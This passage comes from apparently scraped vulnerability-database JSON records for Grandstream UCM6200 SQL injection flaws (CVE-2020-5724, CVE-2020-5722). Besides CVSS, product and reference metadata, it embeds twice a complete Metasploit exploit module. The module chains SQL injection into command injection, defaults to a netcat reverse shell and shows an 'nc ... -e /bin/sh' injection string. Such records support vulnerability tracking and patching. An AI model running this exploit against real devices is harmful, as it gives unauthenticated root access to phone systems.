"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
}
],
"trust": 1.45714287
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
}
]
},
"last_update_date": "2024-02-13T22:30:30.301000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.grandstream.com/"
},
{
"title": "Patch for Grandstream UCM6200 SQL injection vulnerability (CNVD-2020-20680)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/211859"
},
{
"title": "Grandstream UCM6200 SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=113109"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.tenable.com/security/research/tra-2020-17"
},
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-5724"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5724"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/89.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/auxiliary/gather/grandstream_ucm62xx_sql_account_guess/"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"date": "2020-03-30T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"date": "2020-03-30T20:15:20.087000",
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-05-13T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-20680"
},
{
"date": "2020-03-30T00:00:00",
"db": "VULMON",
"id": "CVE-2020-5724"
},
{
"date": "2020-04-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-003469"
},
{
"date": "2020-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-1714"
},
{
"date": "2020-03-30T21:49:40.620000",
"db": "NVD",
"id": "CVE-2020-5724"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Grandstream UCM6200 In the series SQL Injection vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-003469"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1714"
}
],
"trust": 0.6
}
}
VAR-202003-1435
Vulnerability from variot - Updated: 2024-01-18 22:55The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream.
Grandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##
This module requires Metasploit: https://metasploit.com/download
Current source: https://github.com/rapid7/metasploit-framework
class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager
def initialize(info = {}) super( update_info( info, 'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE', 'Description' => %q{ This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and a command injection vulnerability (technically, no assigned CVE but was inadvertently patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX series of devices.
Exploitation happens in two stages:
1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. A command injection that occurs after the user provided username is passed to a Python script
via the shell. Like so:
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
This module affect UCM62xx versions before firmware version 1.0.19.20.
},
'License' => MSF_LICENSE,
'Author' => [
'jbaines-r7' # Vulnerability discovery, original exploit, and Metasploit module
],
'References' => [
[ 'CVE', '2020-5722' ],
[ 'EDB', '48247']
],
'DisclosureDate' => '2020-03-23',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'Payload' => {
'DisableNops' => true,
'BadChars' => '\'&|'
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'wget' ]
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'RPORT' => 8089,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]
}
)
)
register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
## # Sends a POST /cgi request with a payload of action=getInfo. The # server should respond with a large json blob like the following, # where "prog_version" is he firmware version: # # {"response"=>{ # "model_name"=>"UCM6202", "description"=>"IPPBX Appliance", # "device_name"=>"", "logo"=>"images/h_logo.png", "logo_url"=>"http://www.grandstream.com/", # "copyright"=>"Copyright \u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.", # "num_fxo"=>"2", "num_fxs"=>"2", "num_pri"=>"0", "num_eth"=>"2", "allow_nat"=>"1", # "svip_type"=>"4", "net_mode"=>"0", "prog_version"=>"1.0.18.13", "country"=>"US", # "support_openvpn"=>"1", "enable_openvpn"=>"0", "enable_webrtc_openvpn"=>"0", # "support_webrtc_cloud"=>"0"}, "status"=>0} ### def check normalized_uri = normalize_uri(target_uri.path, '/cgi') vprint_status("Requesting version information from #{normalized_uri}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalized_uri, 'vars_post' => { 'action' => 'getInfo' } })
return CheckCode::Unknown('HTTP status code is not 200') unless res&.code == 200
body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json
prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?
vprint_status("The reported version is: #{prog_version}")
version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end
return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
end
##
# Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection
# and then it will get passed to a python script via sh which allows us to execute a command injection.
# It will look something like this:
#
# /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
# password '' cat <<'TTsf7G0' z' or 1=1--;nc 10.0.0.3 4444 -e /bin/sh;TTsf7G0
#
# This functionality is related to the"Forgot Password" feature. This function is rate limited by
# the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few
# payloads are appropriate.
###
def execute_command(cmd, _opts = {})
rand_num = Rex::Text.rand_text_numeric(1..5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cgi'),
'vars_post' =>
{
'action' => 'sendPasswordEmail',
'user_name' => "' or #{rand_num}=#{rand_num}--;#{cmd};"
}
}, 5)
# the netcat reverse shell payload holds the connection open. So we'll treat no response
# as a success. The meterpreter payload does not hold the connection open so this clause digs
# deeper to ensure it succeeded. The server will respond with a non-0 status if the payload
# generates an error (e.g. rate limit error)
if res
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res.code == 200
body_json = res.get_json_document
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
status_json = body_json['status']
fail_with(Failure::UnexpectedReply, 'The JSON response is missing the status element') unless status_json
fail_with(Failure::UnexpectedReply, "The server responded with an error status #{status_json}") unless status_json == 0
end
print_good('Exploit successfully executed.')
end
def exploit print_status("Executing #{target.name} for #{datastore['PAYLOAD']}") case target['Type'] when :unix_cmd execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end end
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1435",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ucm6200",
"scope": "lt",
"trust": 1.6,
"vendor": "grandstream",
"version": "1.0.19.20"
},
{
"model": "ucm6200",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.19.20"
},
{
"model": "ucm6200",
"scope": "eq",
"trust": 0.8,
"vendor": "grandstream",
"version": "1.0.20.17"
},
{
"model": "ucm6200",
"scope": "lt",
"trust": 0.6,
"vendor": "grandstream",
"version": "1.0.20.17"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:grandstream:ucm6200_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "1.0.19.20",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:grandstream:ucm6200:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Jacob Baines",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
}
],
"trust": 0.6
},
"cve": "CVE-2020-5722",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "JVNDB-2020-003190",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-23201",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULMON",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2020-5722",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "HIGH",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-003190",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-5722",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-003190",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-23201",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-1337",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2020-5722",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337"
},
{
"db": "NVD",
"id": "CVE-2020-5722"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The HTTP interface of the Grandstream UCM6200 series is vulnerable to an unauthenticated remote SQL injection via crafted HTTP request. An attacker can use this vulnerability to execute shell commands as root on versions before 1.0.19.20 or inject HTML in password recovery emails in versions before 1.0.20.17. Grandstream UCM6200 In the series SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Grandstream UCM6200 is a set of enterprise-level switches used for IP telephone communication by the US company Grandstream. \n\r\n\r\nGrandstream UCM6200 versions prior to 1.0.19.20 and versions before 1.0.20.17 have SQL injection vulnerabilities. ##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule \u003c Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n \u0027Name\u0027 =\u003e \u0027Grandstream UCM62xx IP PBX sendPasswordEmail RCE\u0027,\n \u0027Description\u0027 =\u003e %q{\n This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and\n a command injection vulnerability (technically, no assigned CVE but was inadvertently\n patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX\n series of devices. \n\n Exploitation happens in two stages:\n\n 1. An SQL injection during username lookup while executing the \"Forgot Password\" function. \n 2. A command injection that occurs after the user provided username is passed to a Python script\n via the shell. Like so:\n\n /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n\n This module affect UCM62xx versions before firmware version 1.0.19.20. \n },\n \u0027License\u0027 =\u003e MSF_LICENSE,\n \u0027Author\u0027 =\u003e [\n \u0027jbaines-r7\u0027 # Vulnerability discovery, original exploit, and Metasploit module\n ],\n \u0027References\u0027 =\u003e [\n [ \u0027CVE\u0027, \u00272020-5722\u0027 ],\n [ \u0027EDB\u0027, \u002748247\u0027]\n ],\n \u0027DisclosureDate\u0027 =\u003e \u00272020-03-23\u0027,\n \u0027Platform\u0027 =\u003e [\u0027unix\u0027, \u0027linux\u0027],\n \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n \u0027Privileged\u0027 =\u003e true,\n \u0027Targets\u0027 =\u003e [\n [\n \u0027Unix Command\u0027,\n {\n \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n \u0027Arch\u0027 =\u003e ARCH_CMD,\n \u0027Type\u0027 =\u003e :unix_cmd,\n \u0027Payload\u0027 =\u003e {\n \u0027DisableNops\u0027 =\u003e true,\n \u0027BadChars\u0027 =\u003e \u0027\\\u0027\u0026|\u0027\n },\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat_gaping\u0027\n }\n }\n ],\n [\n \u0027Linux Dropper\u0027,\n {\n \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n \u0027Type\u0027 =\u003e :linux_dropper,\n \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027 ]\n }\n ]\n ],\n \u0027DefaultTarget\u0027 =\u003e 1,\n \u0027DefaultOptions\u0027 =\u003e {\n \u0027RPORT\u0027 =\u003e 8089,\n \u0027SSL\u0027 =\u003e true\n },\n \u0027Notes\u0027 =\u003e {\n \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n register_options([\n OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n ])\n end\n\n ##\n # Sends a POST /cgi request with a payload of action=getInfo. The\n # server should respond with a large json blob like the following,\n # where \"prog_version\" is he firmware version:\n #\n # {\"response\"=\u003e{\n # \"model_name\"=\u003e\"UCM6202\", \"description\"=\u003e\"IPPBX Appliance\",\n # \"device_name\"=\u003e\"\", \"logo\"=\u003e\"images/h_logo.png\", \"logo_url\"=\u003e\"http://www.grandstream.com/\",\n # \"copyright\"=\u003e\"Copyright \\u00A9 Grandstream Networks, Inc. 2014. All Rights Reserved.\",\n # \"num_fxo\"=\u003e\"2\", \"num_fxs\"=\u003e\"2\", \"num_pri\"=\u003e\"0\", \"num_eth\"=\u003e\"2\", \"allow_nat\"=\u003e\"1\",\n # \"svip_type\"=\u003e\"4\", \"net_mode\"=\u003e\"0\", \"prog_version\"=\u003e\"1.0.18.13\", \"country\"=\u003e\"US\",\n # \"support_openvpn\"=\u003e\"1\", \"enable_openvpn\"=\u003e\"0\", \"enable_webrtc_openvpn\"=\u003e\"0\",\n # \"support_webrtc_cloud\"=\u003e\"0\"}, \"status\"=\u003e0}\n ###\n def check\n normalized_uri = normalize_uri(target_uri.path, \u0027/cgi\u0027)\n vprint_status(\"Requesting version information from #{normalized_uri}\")\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalized_uri,\n \u0027vars_post\u0027 =\u003e { \u0027action\u0027 =\u003e \u0027getInfo\u0027 }\n })\n\n return CheckCode::Unknown(\u0027HTTP status code is not 200\u0027) unless res\u0026.code == 200\n\n body_json = res.get_json_document\n return CheckCode::Unknown(\u0027No JSON in response\u0027) unless body_json\n\n prog_version = body_json.dig(\u0027response\u0027, \u0027prog_version\u0027)\n return false if prog_version.nil?\n\n vprint_status(\"The reported version is: #{prog_version}\")\n\n version = Rex::Version.new(prog_version)\n if version \u003c Rex::Version.new(\u00271.0.19.20\u0027)\n return CheckCode::Appears(\"This determination is based on the version string: #{prog_version}.\")\n end\n\n return CheckCode::Safe(\"This determination is based on the version string: #{prog_version}.\")\n end\n\n ##\n # Throws a payload at the sendPasswordEmail action. The payload must first survive an SQL injection\n # and then it will get passed to a python script via sh which allows us to execute a command injection. \n # It will look something like this:\n #\n # /bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \\\n # password \u0027\u0027 `cat \u003c\u003c\u0027TTsf7G0\u0027 z\u0027 or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `\n #\n # This functionality is related to the\"Forgot Password\" feature. This function is rate limited by\n # the server so that an attacker can only invoke it, at most, every 60 seconds. As such, only a few\n # payloads are appropriate. \n ###\n def execute_command(cmd, _opts = {})\n rand_num = Rex::Text.rand_text_numeric(1..5)\n res = send_request_cgi({\n \u0027method\u0027 =\u003e \u0027POST\u0027,\n \u0027uri\u0027 =\u003e normalize_uri(target_uri.path, \u0027/cgi\u0027),\n \u0027vars_post\u0027 =\u003e\n {\n \u0027action\u0027 =\u003e \u0027sendPasswordEmail\u0027,\n \u0027user_name\u0027 =\u003e \"\u0027 or #{rand_num}=#{rand_num}--`;`#{cmd}`;`\"\n }\n }, 5)\n\n # the netcat reverse shell payload holds the connection open. So we\u0027ll treat no response\n # as a success. The meterpreter payload does not hold the connection open so this clause digs\n # deeper to ensure it succeeded. The server will respond with a non-0 status if the payload\n # generates an error (e.g. rate limit error)\n if res\n fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res.code == 200\n\n body_json = res.get_json_document\n fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n\n status_json = body_json[\u0027status\u0027]\n fail_with(Failure::UnexpectedReply, \u0027The JSON response is missing the status element\u0027) unless status_json\n fail_with(Failure::UnexpectedReply, \"The server responded with an error status #{status_json}\") unless status_json == 0\n end\n\n print_good(\u0027Exploit successfully executed.\u0027)\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n case target[\u0027Type\u0027]\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-5722"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190"
},
{
"db": "CNVD",
"id": "CNVD-2020-23201"
},
{
"db": "VULMON",
"id": "CVE-2020-5722"
},
{
"db": "PACKETSTORM",
"id": "165708"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=48247",
"trust": 0.1,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-5722"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-5722",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "156876",
"trust": 3.1
},
{
"db": "PACKETSTORM",
"id": "165708",
"trust": 1.8
},
{
"db": "TENABLE",
"id": "TRA-2020-15",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003190",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "48247",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2020-23201",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1337",
